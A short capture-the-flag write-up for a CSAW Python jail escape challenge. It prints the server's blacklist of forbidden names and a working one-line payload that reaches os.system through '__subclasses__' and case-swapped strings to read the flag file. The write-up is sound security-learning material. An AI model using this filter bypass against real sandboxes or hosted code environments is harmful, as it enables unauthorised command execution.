Rating:
# slithery (Pwn, 100 points)
> Setting up a new coding environment for my data science students. Some of them
> are l33t h4ck3rs that got RCE and crashed my machine a few times :(. Can you
> help test this before I use it for my class? Two sandboxes should be better than
> one...
>
> nc pwn.chal.csaw.io 5011
FLAG = flag{y4_sl1th3r3d_0ut}
This challenge is a Python jail escape. This being the first Python jail escape I have ever tried and completed I will give a brief summary of how I completed it the unintended way.
While skimming the python script I saw a check to see if the users input was in a blacklist.
```python
command = input(">>> ")
if any([x in command for x in blacklist.BLACKLIST]):
raise Exception("not allowed!!")
```
So I connected to the server and ran the following command to get all the words that were blacklisted.
```python
print(blacklist.BLACKLIST)
['__builtins__', '__import__', 'eval', 'exec', 'import',
'from', 'os', 'sys', 'system', 'timeit', 'base64commands',
'subprocess', 'pty', 'platform', 'open', 'read', 'write',
'dir', 'type']
```
At this point I knew what commands I couldn't use and got completely stuck. I looked up other python jail escape CTF challenges and came across two helpful writeups.
[Escaping Python Jails](https://anee.me/escaping-python-jails-849c65cf306e)
[Python SSTI](https://misakikata.github.io/2020/04/python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E4%B8%8ESSTI/)
It took me a lot of trial and error to finally come up with this over engineered script.
```python
print(''.__class__.__mro__[1].__subclasses__()[109].__init__.__globals__['SYS'.lower()].modules['OS'.lower()].__dict__['SYSTEM'.lower()]('cat flag.txt'))
```
I did look at the server to see where the flag was and I found the intended solution in the same directory as the flag.
I learned a lot from this challenge and hopefully will complete more of these.
